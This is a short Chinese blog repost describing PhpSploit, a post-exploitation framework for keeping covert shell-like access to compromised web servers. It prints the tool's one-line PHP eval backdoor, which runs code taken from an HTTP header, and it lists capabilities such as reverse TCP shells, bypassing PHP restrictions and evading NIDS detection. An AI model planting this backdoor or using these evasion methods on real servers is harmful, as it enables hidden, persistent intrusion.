今天在freebuf 上看到有一篇介紹PhpSploit的遠程控制框架的文章覺得不錯,就把文章超過來了。方便以後自己查找。
phpsploit可以幫助***者在客戶端與Web服務器端之間建立隱蔽性極強的交互式鏈接(類似Shell)。簡而言之,這是一款後***利用工具,它能夠讓***者與目標主機(例如被***的Web服務器)維持訪問鏈接,並實現提權操作。
概述
該工具會對標準客戶端請求以及Web服務器相關請求的HTTP頭數據進行混淆處理,並利用一個小型的多態後門來實現隱蔽通信:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>
功能介紹
效率高:
-
提供了超過20款自動化後***利用工具;
-
運行命令、瀏覽文件系統、繞過PHP安全限制;
-
在目標客戶端與***者端之間實現文件的上傳和下載;
-
通過本地文本編輯器編輯遠程文件;
-
在目標系統中運行SQL語句;
- 生成反向TCP Shell;
隱蔽性強:
-
專爲偏執狂設計;
-
日誌分析以及NIDS簽名檢測機制幾乎無法檢測到它;
-
繞過安全模式以及常見PHP安全限制;
-
通信信息隱藏在HTTP頭中;
-
加載的Payload經過了混淆處理以繞過NIDS;
- 支持http/https/socks4/socks5代理;
使用便捷:
-
跨平臺;
-
強大的界面,完整的命令支持;
-
提供了會話保存/加載功能;
-
支持大型Payload,支持多重請求;
-
提供了強大的、高度可配置的設置引擎;
-
每一個設置(例如用戶代理)都有多態模式;
- 提供了完整的插件開發API;
支持的平臺(***者端)
-
GNU/Linux
- MacOS X
支持的平臺(目標用戶端)
-
GNU/Linux
-
BSDLike
-
MacOS X
- WindowsNT